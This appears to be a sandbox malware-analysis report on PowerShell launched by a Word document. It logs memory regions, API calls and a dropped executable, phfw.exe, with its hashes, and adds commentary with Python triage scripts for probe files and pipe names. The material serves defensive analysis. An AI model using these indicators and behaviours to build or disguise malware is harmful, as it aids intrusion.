private_0x00000048092c0000 0x48092c0000 0x480933ffff Private Memory Readable, Writable True False False -
private_0x0000004809340000 0x4809340000 0x480937ffff Private Memory Readable, Writable True False False -
private_0x0000004809380000 0x4809380000 0x48093fffff Private Memory Readable, Writable True False False -
private_0x0000004809400000 0x4809400000 0x480947ffff Private Memory Readable, Writable True False False -
private_0x0000024700000000 0x24700000000 0x24717ffffff Private Memory Readable, Writable True False False -
private_0x000002477afd0000 0x2477afd0000 0x2477afeffff Private Memory Readable, Writable True False False -
pagefile_0x000002477afd0000 0x2477afd0000 0x2477afdffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477afe0000 0x2477afe0000 0x2477afe6fff Private Memory Readable, Writable True False False -
pagefile_0x000002477aff0000 0x2477aff0000 0x2477b007fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b010000 0x2477b010000 0x2477b013fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b020000 0x2477b020000 0x2477b020fff Pagefile Backed Memory Readable True False False -
private_0x000002477b030000 0x2477b030000 0x2477b030fff Private Memory Readable, Writable True False False -
locale.nls 0x2477b040000 0x2477b104fff Memory Mapped File Readable False False False -
private_0x000002477b110000 0x2477b110000 0x2477b11ffff Private Memory Readable, Writable True False False -
private_0x000002477b120000 0x2477b120000 0x2477b126fff Private Memory Readable, Writable True False False -
private_0x000002477b130000 0x2477b130000 0x2477b22ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477b230000 0x2477b230000 0x2477b437fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b440000 0x2477b440000 0x2477b5c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b5d0000 0x2477b5d0000 0x2477c9cffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9d0000 0x2477c9d0000 0x2477c9d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9e0000 0x2477c9e0000 0x2477c9e0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x2477c9f0000 0x2477c9f2fff Memory Mapped File Readable False False False -
private_0x000002477ca00000 0x2477ca00000 0x2477ca00fff Private Memory Readable, Writable True False False -
private_0x000002477ca10000 0x2477ca10000 0x2477ca10fff Private Memory Readable, Writable True False False -
private_0x000002477ca20000 0x2477ca20000 0x2477ca26fff Private Memory Readable, Writable True False False -
pagefile_0x000002477ca30000 0x2477ca30000 0x2477ca30fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002477ca40000 0x2477ca40000 0x2477ca4ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477ca50000 0x2477ca50000 0x2477ca5ffff Private Memory Readable, Writable True False False -
private_0x000002477ca60000 0x2477ca60000 0x2477ca60fff Private Memory Readable, Writable True False False -
private_0x000002477ca70000 0x2477ca70000 0x2477ca70fff Private Memory Readable, Writable True False False -
private_0x000002477ca80000 0x2477ca80000 0x2477ca8ffff Private Memory Readable, Writable True False False -
private_0x000002477ca90000 0x2477ca90000 0x2477cafffff Private Memory Readable, Writable True False False -
private_0x000002477cb00000 0x2477cb00000 0x2477cb0ffff Private Memory Readable, Writable True False False -
private_0x000002477cb10000 0x2477cb10000 0x2477cb1ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477cb20000 0x2477cb20000 0x2477cb20fff Pagefile Backed Memory Readable True False False -
winnlsres.dll 0x2477cb30000 0x2477cb34fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x2477cb40000 0x2477cb4ffff Memory Mapped File Readable False False False -
pagefile_0x000002477cb50000 0x2477cb50000 0x2477cb50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477cb60000 0x2477cb60000 0x2477cb6ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000002477cb70000 0x2477cb70000 0x2477cbabfff Pagefile Backed Memory Readable, Writable True False False -
microsoft.powershell.utility.psm1 0x2477cbb0000 0x2477cbb7fff Memory Mapped File Readable False False False -
pagefile_0x000002477cbb0000 0x2477cbb0000 0x2477cbb0fff Pagefile Backed Memory Readable True False False -
r00000000000d.clb 0x2477cbc0000 0x2477cbc5fff Memory Mapped File Readable False False False -
private_0x000002477cbd0000 0x2477cbd0000 0x2477cbdffff Private Memory - True False False -
tzres.dll 0x2477cbe0000 0x2477cbe0fff Memory Mapped File Readable, Writable False False False -
tzres.dll.mui 0x2477cbe0000 0x2477cbeafff Memory Mapped File Readable False False False -
private_0x000002477cbe0000 0x2477cbe0000 0x2477cbeffff Private Memory Readable, Writable True False False -
private_0x000002477cc10000 0x2477cc10000 0x2477cc1ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2477cc20000 0x2477cf56fff Memory Mapped File Readable False False False -
private_0x000002477cf60000 0x2477cf60000 0x2477d069fff Private Memory Readable, Writable True False False -
mscorrc.dll 0x2477d070000 0x2477d0d1fff Memory Mapped File Readable True False False -
private_0x000002477d130000 0x2477d130000 0x2477d13ffff Private Memory Readable, Writable, Executable True False False -
rpcss.dll 0x2477d140000 0x2477d248fff Memory Mapped File Readable False False False -
private_0x000002477d140000 0x2477d140000 0x2477d23ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477d240000 0x2477d240000 0x2477d63ffff Pagefile Backed Memory Readable True False False -
microsoft-windows-client-features-wow64-package-automerged-onecore~31bf3856ad364e35~amd64~~10.0.15063.0.cat 0x2477d640000 0x2477d715fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff640000 0x7df5ff640000 0x7ff5ff63ffff Pagefile Backed Memory - True False False -
private_0x00007ff687810000 0x7ff687810000 0x7ff68781ffff Private Memory Readable, Writable, Executable True False False -
private_0x00007ff687820000 0x7ff687820000 0x7ff6878bffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00007ff6878c0000 0x7ff6878c0000 0x7ff6879bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6879c0000 0x7ff6879c0000 0x7ff6879e2fff Pagefile Backed Memory Readable True False False -
powershell.exe 0x7ff687ae0000 0x7ff687b4ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff94fe60000 0x7ff94fe60000 0x7ff94fe6ffff Private Memory - True False False -
private_0x00007ff94fe70000 0x7ff94fe70000 0x7ff94fe7ffff Private Memory - True False False -
private_0x00007ff94fe80000 0x7ff94fe80000 0x7ff94ff0ffff Private Memory - True False False -
private_0x00007ff94ff10000 0x7ff94ff10000 0x7ff94ff7ffff Private Memory - True False False -
private_0x00007ff94ff80000 0x7ff94ff80000 0x7ff94ffbffff Private Memory - True False False -
private_0x00007ff94ffc0000 0x7ff94ffc0000 0x7ff94ffcffff Private Memory - True False False -
private_0x00007ff94ffd0000 0x7ff94ffd0000 0x7ff94ffdffff Private Memory - True False False -
private_0x00007ff94ffe0000 0x7ff94ffe0000 0x7ff94ffeffff Private Memory - True False False -
private_0x00007ff94fff0000 0x7ff94fff0000 0x7ff94fffffff Private Memory - True False False -
private_0x00007ff950000000 0x7ff950000000 0x7ff95000ffff Private Memory - True False False -
private_0x00007ff950010000 0x7ff950010000 0x7ff95001ffff Private Memory - True False False -
system.transactions.dll 0x7ff9a8980000 0x7ff9a89cefff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x7ff9a89d0000 0x7ff9a8aa5fff Memory Mapped File Readable, Writable, Executable True False False -
system.numerics.ni.dll 0x7ff9a8ab0000 0x7ff9a8afefff Memory Mapped File Readable, Writable, Executable True False False -
system.xml.ni.dll 0x7ff9a8ba0000 0x7ff9a9436fff Memory Mapped File Readable, Writable, Executable True False False -
system.directoryservices.ni.dll 0x7ff9a9440000 0x7ff9a959efff Memory Mapped File Readable, Writable, Executable True False False -
system.management.ni.dll 0x7ff9a95a0000 0x7ff9a96fffff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x7ff9aa690000 0x7ff9ac694fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x7ff9ac6a0000 0x7ff9ac745fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x7ff9ac750000 0x7ff9ad10efff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ff9ad110000 0x7ff9add31fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ff9adf10000 0x7ff9af48dfff Memory Mapped File Readable, Writable, Executable True False False -
msvcr120_clr0400.dll 0x7ff9af490000 0x7ff9af586fff Memory Mapped File Readable, Writable, Executable False False False -
clr.dll 0x7ff9af590000 0x7ff9aff6dfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.management.infrastructure.ni.dll 0x7ff9b0be0000 0x7ff9b0c7afff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x7ff9b1d50000 0x7ff9b1d6bfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.security.ni.dll 0x7ff9b21f0000 0x7ff9b224efff Memory Mapped File Readable, Writable, Executable True False False -
clrjit.dll 0x7ff9b2250000 0x7ff9b2363fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.ni.dll 0x7ff9b2370000 0x7ff9b2491fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.dll 0x7ff9b24a0000 0x7ff9b27f4fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.ni.dll 0x7ff9b2800000 0x7ff9b30fcfff Memory Mapped File Readable, Writable, Executable True False False -
mpoav.dll 0x7ff9b3510000 0x7ff9b352ffff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ff9b3530000 0x7ff9b353ffff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ff9b35a0000 0x7ff9b363cfff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ff9bec50000 0x7ff9becb2fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x7ff9ce320000 0x7ff9ce329fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ff9d9010000 0x7ff9d9031fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ff9d9750000 0x7ff9d9783fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ff9d9cd0000 0x7ff9d9ce6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ff9d9cf0000 0x7ff9d9cfafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ff9da050000 0x7ff9da074fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ff9da220000 0x7ff9da234fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ff9da240000 0x7ff9da250fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ff9da260000 0x7ff9da270fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ff9da280000 0x7ff9da2cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ff9da2d0000 0x7ff9da518fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x7ff9da520000 0x7ff9da6a7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ff9da6b0000 0x7ff9dada2fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ff9dadb0000 0x7ff9dae05fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x7ff9dae10000 0x7ff9dae2dfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ff9daee0000 0x7ff9db0a8fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ff9db0b0000 0x7ff9db0f8fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ff9db100000 0x7ff9db169fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ff9db170000 0x7ff9db265fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x7ff9db270000 0x7ff9db309fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x7ff9db310000 0x7ff9db317fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ff9db380000 0x7ff9db41dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ff9db420000 0x7ff9db4dffff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ff9db4e0000 0x7ff9dc916fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ff9dcf20000 0x7ff9dcf70fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ff9dcf80000 0x7ff9dcfd8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ff9dd0f0000 0x7ff9dd11cfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ff9dd120000 0x7ff9dd146fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ff9dd150000 0x7ff9dd294fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ff9dd2a0000 0x7ff9dd349fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ff9dd4e0000 0x7ff9dd604fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ff9dd610000 0x7ff9dd6b0fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9dd6c0000 0x7ff9dd76dfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ff9dd770000 0x7ff9dda68fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9dda70000 0x7ff9ddb0cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ff9ddb10000 0x7ff9ddb7bfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ff9ddc60000 0x7ff9ddda9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 59 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_pcfxszbc.ddv.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b, SHA1: 356a192b7913b04c54574d18c28d46e6395428ab, SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b False
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_gbsbmxho.bhs.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b, SHA1: 356a192b7913b04c54574d18c28d46e6395428ab, SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b False
c:\users\fd1hvy\appdata\local\temp\phfw.exe 255.01 KB MD5: 368a8f05fa7be1fcc24f445c444acb30, SHA1: 909bee1d1a19f2ea43ba38e826d49c0e7cf958b3, SHA256: 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f False
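Of the three files PowerShell created, only phfw.exe is the payload. The two __PSScriptPolicyTest_*.ps1/.psm1 files are the probe PowerShell writes to %TEMP% on startup to learn whether an AppLocker/WDAC script policy applies to it; they contain the single character 1, which is why both report as 0.00 KB with identical hashes. The check below is an added example, not VMRay code or part of the report: it recomputes those hashes to confirm the probe, and classifies the Created Files rows (constructed here from the table above) so that an analyst does not waste time on the probe files or, conversely, wave through a file that merely borrows the probe's name.

```python
"""Separate PowerShell's own policy-probe files from dropped payloads.

Added example; not part of the VMRay report. CREATED_FILES is constructed from the
report's Created Files table; the classification labels are assumptions.
"""
import hashlib
import re

PROBE_CONTENT = b"1"   # what PowerShell writes into __PSScriptPolicyTest_*.ps1 / .psm1
PROBE_NAME = re.compile(r"__psscriptpolicytest_[a-z0-9]+\.[a-z0-9]+\.psm?1$", re.IGNORECASE)

CREATED_FILES = [
    {"path": r"c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_pcfxszbc.ddv.ps1",
     "size_kb": 0.00,
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"path": r"c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_gbsbmxho.bhs.psm1",
     "size_kb": 0.00,
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"path": r"c:\users\fd1hvy\appdata\local\temp\phfw.exe",
     "size_kb": 255.01,
     "sha256": "846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f"},
]


def probe_hashes():
    """MD5/SHA1/SHA256 of the one-byte probe content, for comparison with the report's table."""
    return {
        "md5": hashlib.md5(PROBE_CONTENT).hexdigest(),
        "sha1": hashlib.sha1(PROBE_CONTENT).hexdigest(),
        "sha256": hashlib.sha256(PROBE_CONTENT).hexdigest(),
    }


def classify(entry):
    """policy_probe: name and content both match PowerShell's test file.
    suspicious_probe_name: name matches but content differs (something hiding behind the name).
    payload_candidate: anything else PowerShell wrote, worth a closer look."""
    name = entry["path"].rsplit("\\", 1)[-1]
    if PROBE_NAME.search(name):
        return "policy_probe" if entry["sha256"].lower() == probe_hashes()["sha256"] else "suspicious_probe_name"
    return "payload_candidate"


def triage(entries):
    """Map each created path to its classification."""
    return {e["path"]: classify(e) for e in entries}


if __name__ == "__main__":
    for path, verdict in triage(CREATED_FILES).items():
        print(verdict, path)
```

The probe's presence also tells you something about the host: PowerShell only writes it because it is deciding between FullLanguage and ConstrainedLanguage mode, and since the download cradle ran unhindered, no script policy was enforced on this machine.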
Threads
Thread 0xda8
128 0
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext False 1
Fn
File Get Info filename = C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = TZI, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Module Load module_name = C:\WINDOWS\system32\en-US\tzres.dll.mui, base_address = 0x2477cbe0001 True 3
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
File Create Pipe pipe_name = \device\namedpipe\pshost.131687220369232747.4512.defaultappdomain.powershell, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
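The pipe created above is the PowerShell host's own listener, and its name is worth decoding: the first numeric field is the host process start time as a Windows FILETIME and the second is the PID in decimal, so it ties this thread back to the process and to the wall clock. The decoder below is an added example, not VMRay code or part of the report; the field layout (pshost.<FILETIME>.<PID>.<AppDomain>.<host name>) is the naming convention of the PowerShell host as I know it, and should be treated as an assumption for other PowerShell builds.

```python
"""Decode the PSHost named-pipe name from the File Create Pipe entry above.

Added example; not part of the VMRay report. Assumes the pipe is named
pshost.<start FILETIME>.<PID>.<AppDomain>.<host name>.
"""
import re
from datetime import datetime, timedelta, timezone

PIPE_RE = re.compile(r"pshost\.(\d+)\.(\d+)\.(\w+)\.(\w+)$", re.IGNORECASE)
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME counts 100 ns ticks from here


def filetime_to_datetime(ticks):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware UTC datetime, whole seconds."""
    return (FILETIME_EPOCH + timedelta(microseconds=ticks // 10)).replace(microsecond=0)


def decode_pshost_pipe(pipe_name):
    """Return start time, PID, AppDomain and host name, or None if the name does not fit."""
    m = PIPE_RE.search(pipe_name)
    if not m:
        return None
    return {
        "start_utc": filetime_to_datetime(int(m.group(1))),
        "pid": int(m.group(2)),          # decimal in the pipe name; the report lists PIDs in hex
        "appdomain": m.group(3),
        "host": m.group(4),
    }


def matches_process(pipe_name, report_pid_hex):
    """True when the pipe belongs to the monitored process whose PID the report gives in hex."""
    info = decode_pshost_pipe(pipe_name)
    return info is not None and info["pid"] == int(report_pid_hex, 16)


if __name__ == "__main__":
    # Pipe name copied from the File Create Pipe entry in this thread.
    name = r"\device\namedpipe\pshost.131687220369232747.4512.defaultappdomain.powershell"
    print(decode_pshost_pipe(name), matches_process(name, "0x11a0"))
```

For the name in this report the PID field decodes to 4512, which is 0x11a0, the PID shown in the OS Process Information table, and the FILETIME decodes to 2018-04-20 18:20:36 UTC. With the sandbox's W. Europe Standard Time zone on summer time (UTC+2) that is 20:20:36 local, one second after the 20:20:35 Get Time calls the parent WINWORD.EXE made immediately before the Process Create.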
File Get Info type = file_type True 1
Fn
Environment Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Set Environment String name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Environment True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Set Environment String name = PSMODULEPATH, value = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 4
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 3
Fn
Environment Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 3
Fn
